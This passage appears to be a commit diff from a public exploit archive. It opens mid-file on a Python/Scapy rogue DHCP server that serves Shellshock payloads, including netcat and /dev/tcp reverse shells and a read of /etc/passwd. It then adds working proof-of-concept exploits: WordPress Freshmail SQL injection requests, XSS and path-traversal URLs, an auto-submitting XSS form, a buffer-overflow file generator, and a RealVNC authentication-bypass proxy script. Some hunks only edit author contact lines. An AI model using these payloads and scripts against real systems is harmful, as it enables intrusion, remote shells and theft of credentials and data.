subnet_mask = "255.255.255.0"
dns_ip = "8.8.8.8"
spoofed_mac = "00:50:56:c0:00:01"
payload = "() { ignored;}; echo 'moo'"
payload_2 = "() { ignored;}; /bin/nc -e /bin/bash localhost 7777"
payload_3 = "() { ignored;}; /bin/bash -i >& /dev/tcp/10.0.1.1/4444 0>&1 &"
payload_4 = "() { ignored;}; /bin/cat /etc/passwd"
payload_5 = "() { ignored;}; /usr/bin/wget http://google.com"
rce = payload_5
def toMAC(strMac):
cmList = strMac.split(":")
hCMList = []
for iter1 in cmList:
hCMList.append(int(iter1, 16))
hMAC = struct.pack('!B', hCMList[0]) + struct.pack('!B', hCMList[1]) + struct.pack('!B', hCMList[2]) + struct.pack('!B', hCMList[3]) + struct.pack('!B', hCMList[4]) + struct.pack('!B', hCMList[5])
return hMAC
def detect_dhcp(pkt):
# print 'Process ', ls(pkt)
if DHCP in pkt:
# if DHCP Discover then DHCP Offer
if pkt[DHCP].options[0][1]==1:
clientMAC = pkt[Ether].src
print "DHCP Discover packet detected from " + clientMAC
sendp(
Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/
IP(src=server_ip,dst="255.255.255.255")/
UDP(sport=67,dport=68)/
BOOTP(
op=2,
yiaddr=victim_assign_ip,
siaddr=server_ip,
giaddr=gateway_ip,
chaddr=toMAC(clientMAC),
xid=pkt[BOOTP].xid,
sname=server_ip
)/
DHCP(options=[('message-type','offer')])/
DHCP(options=[('subnet_mask',subnet_mask)])/
DHCP(options=[('name_server',dns_ip)])/
DHCP(options=[('lease_time',43200)])/
DHCP(options=[('router',gateway_ip)])/
DHCP(options=[('dump_path',rce)])/
DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1"
)
print "DHCP Offer packet sent"
# if DHCP Request than DHCP ACK
if pkt[DHCP] and pkt[DHCP].options[0][1] == 3:
clientMAC = pkt[Ether].src
print "DHCP Request packet detected from " + clientMAC
sendp(
Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/
IP(src=server_ip,dst="255.255.255.255")/
UDP(sport=67,dport=68)/
BOOTP(
op=2,
yiaddr=victim_assign_ip,
siaddr=server_ip,
giaddr=gateway_ip,
chaddr=toMAC(clientMAC),
xid=pkt[BOOTP].xid
)/
DHCP(options=[('message-type','ack')])/
DHCP(options=[('subnet_mask',subnet_mask)])/
DHCP(options=[('lease_time',43200)])/
DHCP(options=[('router',gateway_ip)])/
DHCP(options=[('name_server',dns_ip)])/
DHCP(options=[('dump_path',rce)])/
DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1"
)
print "DHCP Ack packet sent"
def main():
#sniff DHCP requests
sniff(filter="udp and (port 67 or 68)", prn=detect_dhcp, iface="vmnet1")
if __name__ == '__main__':
sys.exit(main())

88
platforms/multiple/webapps/36930.txt Executable file
View file

@ -0,0 +1,88 @@
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: *http://freshmail.com/ <http://freshmail.com/>
# Version: <=3D 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
1. Summary
------------------
Freshmail plugin is an email marketing plugin for wordpress, allowing the
administrator to create mail campaigns and keep track of them.
There is a unauthenticated SQL injection vulnerability in the "Subscribe to
our newsletter" formularies showed to the web visitors in the POST
parameter *fm_form_id. *
2. Vulnerability timeline
----------------------------------
- 04/05/2015: Identified in version 1.5.8 and contact the developer company
by twitter.
- 05/05/2015: Send the details by mail to developer.
- 05/05/2015: Response from the developer.
- 06/05/2015: Fixed version in 1.6
3. Vulnerable code
---------------------------
Vulnerable File: include/wp_ajax_fm_form.php, lines 44 and 50
[...]
Line 28: add_action('wp_ajax_fm_form', 'fm_form_ajax_func');
Line 29: add_action('wp_ajax_nopriv_fm_form', 'fm_form_ajax_func');
[...]
Line 44: $result =3D $_POST;
[...]
Line 50: $form =3D $wpdb->get_row('select * from '.$wpdb->prefix.'fm_forms
where form_id=3D"'.*$result['fm_form_id']*.'";');
[...]
3. Proof of concept
---------------------------
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <web>
X-Requested-With: XMLHttpRequest
[...]
Cookie: wordpress_f30[...]
form%5Bemail%5D=3Dfake@fake.com&form%5Bimie%5D=3Dasdf&fm_form_id=3D1" and
"a"=3D"a&action=3Dfm_form&fm_form_referer=3D%2F
4. Explanation
---------------------
A page visitor can submit an email (fake@fake.com) to subscribe to the
formulary with fm_form_id=3D"1" and the JSON message received will be simil=
ar
to:
{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1*
","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s=
uccess","message":"*Your
sign up request was successful! Please check your email inbox.*"}
The second time he tries to do the same with the same email the message
returned will be:
{"form":{"email":"fake@fake.com","imie":"asdf"},"fm_form_id":"*1*
","action":"fm_form","fm_form_referer":"\/?p=3D86","redirect":0,"status":"s=
uccess","message":"*Given
email address is already subscribed, thank you!*"}
If we insert *1**" and substr(user(),1,1)=3D"a *we'll receive either the sa=
me
message indicating that the Given email is already subscribed indicating
that the first character of the username is an "a" or a null message
indicating that the username first character is not an "a".
5. Solution
---------------
Update to version 1.6

4
platforms/php/webapps/14622.txt
View file

@ -1,7 +1,7 @@
# Exploit Title: KnowledgeTree 3.5.2 Community Edition Permanent XSS Vulnerability
# Date: 2010-08-11
# Author: fdisk (@fdiskyou)
# e-mail: fdiskyou at deniable.org
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Software Link: http://www.knowledgetree.com/products/community/download
# Version: 3.5.2
# Notes: Fixed in the last version.

7
platforms/php/webapps/36926.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/52347/info
LeKommerce is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/path/secc.php?id={sqli}

11
platforms/php/webapps/36927.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/52350/info
ToendaCMS is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.
The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
ToendaCMS 1.6.2 is vulnerable; other versions may also be affected.
http://www.example.com/setup/index.php?site=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/s

30
platforms/php/webapps/36937.html Executable file
View file

@ -0,0 +1,30 @@
source: http://www.securityfocus.com/bid/52377/info
phpMyVisites is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
phpMyVisites 2.4 is vulnerable; other versions may also be affected.
<html>
<head>
<title>Warning! This is Proof Of Concept Exploit for phpMyVisites 2.4 (version.php 238 2009-12-16 19:48:15Z matthieu_ $)</title>
</head>
<h1> Warning! This is a Proof Of Concept Exploit for phpMyVisites 2.4:<br/></h1>
<p>// $Id: version.php 238 2009-12-16 19:48:15Z matthieu_ $
PHPMV_VERSION 2.4
</p>
</h1>
<body onload="javascript:document.forms[0].submit()">
<form action="http://CHANGE_TO_RTARGET/phpmv2/index.php?mod=install_database_setup" method="post" name="form_phpmv" id="form_phpmv">
<input value="<script>alert(document.cookie);</script>" name="form_dblogin" type="hidden" />
<input value="<script>alert(document.cookie);</script>" name="form_dbpassword" type="hidden" />
<input value="<script>alert(document.cookie);</script>" name="form_dbhost" type="hidden" />
<input value="<script>alert(document.cookie);</script>" name="form_dbname" type="hidden" />
<input value="<script>alert(document.cookie);</script>" name="form_dbprefix" type="hidden"/></td>
<!--- Author: AkaStep -->
</form>
</body>
</html>

9
platforms/php/webapps/36938.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/52399/info
singapore is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
singapore 0.10.1 is vulnerable; other versions may also be affected.
http://www.example.com/patch/index.php?gallery=<script>alert('31337')</script>

215
platforms/php/webapps/36942.txt Executable file
View file

@ -0,0 +1,215 @@
# Exploit Title: Unauthenticated SQL Injection on Wordpress Freshmail (#1)
# Google Dork: N/A
# Date: 05/05/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage:
*http://freshmail.com/ <http://freshmail.com/> *
# Software Link:
*https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip
<https://downloads.wordpress.org/plugin/freshmail-newsletter.latest-stable.zip>*
# Version: <= 1.5.8, Communicated and Fixed by the Vendor in 1.6
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
1. Summary
------------------
Freshmail plugin is an email marketing plugin for wordpress, allowing the
administrator to create mail campaigns and keep track of them.
There is a SQL Injection vulnerability available for collaborators (or
higher privileged users) for webs with freshmail plugin installed. The SQL
Injection in located in the attribute "id" of the inserted shortcode
[FM_form *id="N"*]. The shortcode attribute "id" is not sanitized before
inserting it in a SQL query.
A collaborator can insert shortcodes when he/she is editing a new post or
page and can preview the results (no administrator approval needed),
launching this SQL Injection.
2. Vulnerability timeline
----------------------------------
- 04/05/2015: Identified in version 1.5.8 and contact the developer company
by twitter.
- 05/05/2015: Send the details by mail to developer.
- 05/05/2015: Response from the developer.
- 06/05/2015: Fixed version in 1.6
3. Vulnerable code
---------------------------
Vulnerable File: include/shortcode.php, lines 27 and 120:
Line 19: function fm_form_func($atts)
[...]
Line 27: $form_value = $wpdb->get_row("select * from
".$wpdb->prefix.'fm_forms where form_id="'.$atts['id'].'";');
[...]
Line 120: add_shortcode('FM_form', 'fm_form_func');
3. Proof of concept
---------------------------
1. As collaborator, start a new post.
2. Insert the shortcode [FM_form id='1" and substr(user(),1,1)="b']
3. Click preview.
4. If the form is shown, the statement is true, if not, false.
POST /wp-admin/post.php HTTP/1.1
Host: <web>
Content-Length: 3979
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: <web>
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/43.0.2357.37 Safari/537.36
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundary384PE6lRgBcOibkL
Referer: http://<web>/wp-admin/post.php?post=69&action=edit&message=8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_f305[...]
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wpnonce"
0a75a3666b
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wp_http_referer"
/wp-admin/post.php?post=69&action=edit&message=8
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="user_ID"
4
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="action"
editpost
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="originalaction"
editpost
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_author"
4
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_type"
post
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="original_post_status"
pending
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="referredby"
http://<web>/wp-admin/post.php?post=69&action=edit&message=8
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_wp_original_http_referer"
http://<web>/wp-admin/post.php?post=69&action=edit&message=8
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_ID"
69
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="meta-box-order-nonce"
f8aa04e508
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="closedpostboxesnonce"
ebf65a43ed
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_title"
Testing SQLi in shortcode
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="samplepermalinknonce"
e753a2d8f2
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="content"
[FM_form id='1" and substr(user(),1,1)="b]
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="wp-preview"
dopreview
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="original_publish"
Submit for Review
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_format"
0
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_category[]"
0
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="post_category[]"
1
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="tax_input[post_tag]"
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="newtag[post_tag]"
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="excerpt"
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="trackback_url"
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metakeyselect"
#NONE#
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metakeyinput"
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="metavalue"
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="_ajax_nonce-add-meta"
6a13a5a808
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="advanced_view"
1
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="comment_status"
open
------WebKitFormBoundary384PE6lRgBcOibkL
Content-Disposition: form-data; name="ping_status"
open
------WebKitFormBoundary384PE6lRgBcOibkL--
5. Solution
---------------
Update to version 1.6

4
platforms/windows/dos/14646.py
View file

@ -1,7 +1,7 @@
# Exploit Title: Computer Associates Advantage Ingres 2.6 Multiple Buffer Overflow Vulnerabilities PoC
# Date: 2010-08-14
# Author: fdisk (@fdiskyou)
# e-mail: fdiskyou at deniable.org
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE: CVE-2007-3336 - CVE-2007-3338

4
platforms/windows/local/14497.py
View file

@ -1,8 +1,8 @@
#!/usr/bin/python
# Exploit Title: WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow (SEH)
# Date: 2010-07-28
# Author: fdisk (@fdiskyou)
# e-mail: fdiskyou at deniable.org
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 3.1.2.2 2010.04.15
# Tested on Windows XP SP3 en

4
platforms/windows/local/15941.py
View file

@ -3,8 +3,8 @@
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow (SEH)
# WINDOWS XP SP3 EN Fully Patched
# Bug found by http://www.exploit-db.com/exploits/15248/
# POC and Exploit by fdisk (@fdiskyou)
# e-mail: fdiskyou at deniable.org
# POC and Exploit by @fdiskyou
# e-mail: rui at deniable.org
# This POC was already been released here (without proper shellcode): http://www.exploit-db.com/winamp-5-58-from-dos-to-code-execution/
# We later gave up on SEH and went straight for direct EIP overwrite, yesterday I couldn't sleep and decided to finish cooking this version.
# Further References:

75
platforms/windows/local/36928.py Executable file
View file

@ -0,0 +1,75 @@
source: http://www.securityfocus.com/bid/52351/info
Macro Toolworks is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Local attackers can exploit this issue to run arbitrary code with elevated privileges. Failed exploit attempts can result in a denial-of-service condition.
Macro Toolworks 7.5.0 is vulnerable; other versions may also be affected.
#!/usr/bin/python
# Exploit Title: Pitrinec Software Macro Toolworks Free/Standard/Pro v7.5.0 Local Buffer Overflow
# Version: 7.5.0
# Date: 2012-03-04
# Author: Julien Ahrens
# Homepage: http://www.inshell.net
# Software Link: http://www.macrotoolworks.com
# Tested on: Windows XP SP3 Professional German / Windows 7 SP1 Home Premium German
# Notes: Overflow occurs in _prog.exe, vulnerable are all Pitrinec applications on the same way.
# Howto: Copy options.ini to App-Dir --> Launch
# 646D36: The instruction at 0x646D36 referenced memory at 0x42424242. The memory could not be read -> 42424242
(exc.code c0000005, tid 3128)
# Registers:
# EAX 0120EA00 Stack[000004C8]:0120EA00
# EBX FFFFFFFF
# ECX 42424242
# EDX 00000002
# ESI 007F6348 _prog.exe:007F6348
# EDI 007F6348 _prog.exe:007F6348
# EBP 0120EA0C Stack[000004C8]:0120EA0C
# ESP 0120E9E8 Stack[000004C8]:0120E9E8
# EIP 00646D36 _prog.exe:00646D36
# EFL 00200206
# Stack:
# 0120E9E0 0012DF3C
# 0120E9E4 00000000
# 0120E9E8 0205A5A0 debug045:0205A5A0
# 0120E9EC 1B879EF8
# 0120E9F0 007F6348 _prog.exe:007F6348
# 0120E9F4 007F6348 _prog.exe:007F6348
# Crash:
# _prog.exe:00646D36 ; ---------------------------------------------------------------------------
# _prog.exe:00646D36 mov eax, [ecx]
# _prog.exe:00646D38 call dword ptr [eax+0Ch]
# _prog.exe:00646D3B call near ptr unk_6750D0
# _prog.exe:00646D40 retn 4
# _prog.exe:00646D40 ; ---------------------------------------------------------------------------
# Dump:
# 007F6380 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
# 007F6390 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
# 007F63A0 42 42 42 42 43 43 43 43 43 43 43 43 43 43 43 43 BBBBCCCCCCCCCCCC
# 007F63B0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
# 007F63C0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
file="options.ini"
junk1="\x41" * 744
boom="\x42\x42\x42\x42"
junk2="\x43" * 100
poc="[last]\n"
poc=poc + "file=" + junk1 + boom + junk2
try:
print "[*] Creating exploit file...\n"
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!"
except:
print "[!] Error while creating file!"

4
platforms/windows/remote/14402.py
View file

@ -1,7 +1,7 @@
# Exploit Title: Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit (Post Auth)
# Date: 2010-07-18
# Author: fdisk (@fdiskyou)
# e-mail: fdiskyou at deniable.org
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Software Link:
# Version: 1.7.0.11
# Tested on: Windows XP SP3 en

4
platforms/windows/remote/17339.py
View file

@ -1,7 +1,7 @@
# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability PoC (ZDI-11-055)
# Date: 2011-05-28
# Author: fdisk (@fdiskyou)
# e-mail: fdiskyou at deniable.org
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 6.11
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0923

4
platforms/windows/remote/17345.py
View file

@ -1,7 +1,7 @@
# Exploit Title: HP Data Protector Cliet EXEC_SETUP Remote Code Execution Vulnerability PoC (ZDI-11-056)
# Date: 2011-05-29
# Author: fdisk (@fdiskyou)
# e-mail: fdiskyou at deniable.org
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 6.11
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0922

95
platforms/windows/remote/36932.py Executable file
View file

@ -0,0 +1,95 @@
# Exploit Title: RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit
# Date: 2012-05-13
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 4.1.0 and 4.1.1
# Tested on: Windows XP
# CVE: CVE-2006-2369
# Requires vncviewer installed
# Basic port of hdmoore/msf2 perl version to python for fun and profit (ease of use)
import select
import thread
import os
import socket
import sys, re
BIND_ADDR = '127.0.0.1'
BIND_PORT = 4444
def pwn4ge(host, port):
socket.setdefaulttimeout(5)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.connect((host, port))
except socket.error, msg:
print '[*] Could not connect to the target VNC service. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1]
sys.exit();
else:
hello = server.recv(12)
print "[*] Hello From Server: " + hello
if hello != "RFB 003.008\n":
print "[*] The remote VNC service is not vulnerable"
sys.exit()
else:
print "[*] The remote VNC service is vulnerable"
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
listener.bind((BIND_ADDR, BIND_PORT))
except socket.error , msg:
print '[*] Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
sys.exit()
print "[*] Listener Socket Bind Complete"
listener.listen(10)
print "[*] Launching local vncviewer"
thread.start_new_thread(os.system,('vncviewer ' + BIND_ADDR + '::' + str(BIND_PORT),))
print "[*] Listener waiting for VNC connections on localhost"
client, caddr = listener.accept()
listener.close()
client.send(hello)
chello = client.recv(12)
server.send(chello)
methods = server.recv(2)
print "[*] Auth Methods Recieved. Sending Null Authentication Option to Client"
client.send("\x01\x01")
client.recv(1)
server.send("\x01")
server.recv(4)
client.send("\x00\x00\x00\x00")
print "[*] Proxying data between the connections..."
running = True
while running:
selected = select.select([client, server], [], [])[0]
if client in selected:
buf = client.recv(8192)
if len(buf) == 0:
running = False
server.send(buf)
if server in selected and running:
buf = server.recv(8192)
if len(buf) == 0:
running = False
client.send(buf)
pass
client.close()
server.close()
sys.exit()
def printUsage():
print "[*] Read the source, Luke!"
def main():
try:
SERV_ADDR = sys.argv[1]
SERV_PORT = sys.argv[2]
except:
SERV_ADDR = raw_input("[*] Please input an IP address to pwn: ")
SERV_PORT = 5900
try:
socket.inet_aton(SERV_ADDR)
except socket.error:
printUsage()
else:
pwn4ge(SERV_ADDR, int(SERV_PORT))
if __name__ == "__main__":
main()

70
platforms/xml/webapps/36941.txt Executable file
View file

@ -0,0 +1,70 @@
IBM WebSphere Portal Stored Cross-Site Scripting Vulnerability [CVE-2014-0910]
[+] Author: Filippo Roncari
[+] Target: IBM WebSphere Portal
[+] Version: 7.0, 6.1.5, 6.1.0
[+] Vendor: http://www.ibm.com
[+] Accessibility: Remote
[+] Severity: Medium
[+] CVE: CVE-2014-0910
[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-14-04-IBM.pdf
[+] Info: f.roncari@securenetwork.it
[+] Summary
IBM WebSphere Portal is a leader in the market product that provides enterprise web portals to help companies deliver a highly-personalized, social experience for their customers. IBM WebSphere Portal gives users a single point of access to the applications, services, information and social connections they need.
[+] Vulnerability Details
IBM WebSphere Portal is prone to a stored Cross-Site Scripting (XSS) vulnerability in the Web Content Management component, which allows authenticated users to inject arbitrary JavaScript.
A potential attacker authenticated to the Web Content Management can exploit this vulnerability by creating a malicious web content and persuading the victim to visit it. This issue can lead to different kind of user-targeted attacks such as cookie stealing and account violation.
[+] Technical Details
View full advisory at https://www.securenetwork.it/docs/advisory/SN-14-04-IBM.pdf for technical details and source code.
[+] Proof of Concept (PoC)
Authors are able to insert HTML tags through the HTML view of the Rich Text Editor when creating a new web content, although active scripts are blocked and not executed. However it is possible to inject arbitrary JavaScript using a licit tag such as "img". Rich Text Editor tries to correctly handle the tag allowing client-side script being executed. A trivial payload like the following can be used:
[!] Sample Payload
-------------------------
<img src=a onerror=alert(document.cookie)>
-------------------------
An exemplifying HTTP request is reported below.
[!] PoC HTTP Request
-------------------------
POST portal/!ut/p/b1/pZHLboMwEEW_KLJJeC5HGHAQkJZQCt5EzqMmx[...] HTTP/1.1 Host:
Proxy-Connection: keep-alive
Content-Length: 20108
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAzBIVym1up1GRKBv Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch
Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
------W ebKitFormBoundaryAzBIVym1up1GRKBv
Content-Disposition: form-data; name="PC_Z7_CGAH47L00OJ790IAH1AFAN1GT0000000_wh"
save_and_read_controllable
------W ebKitFormBoundaryAzBIVym1up1GRKBv
Content-Disposition: form-data; name="PC_Z7_CGAH47L00OJ790IAH1AFAN1GT0000000_wa"
[...] true
------W ebKitFormBoundaryAzBIVym1up1GRKBv
Content-Disposition: form-data; name="cmpnt_map_19W14388ed1e14Content_inithtml"
------W ebKitFormBoundaryAzBIVym1up1GRKBv
Content-Disposition: form-data; name="PC_Z7_CGAH47L00OJ790IAH1AFAN1GT0000000_cmpnt_map_19W14388ed1e14Content"
<img src=a onerror=alert(document.cookie)>
------W ebKitFormBoundaryAzBIVym1up1GRKBv
Content-Disposition: form-data; name="cmpnt_map_19W14388ed1e14_RTE"
-------------------------
For further details and explanations check the full advisory.
[+] Disclaimer
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.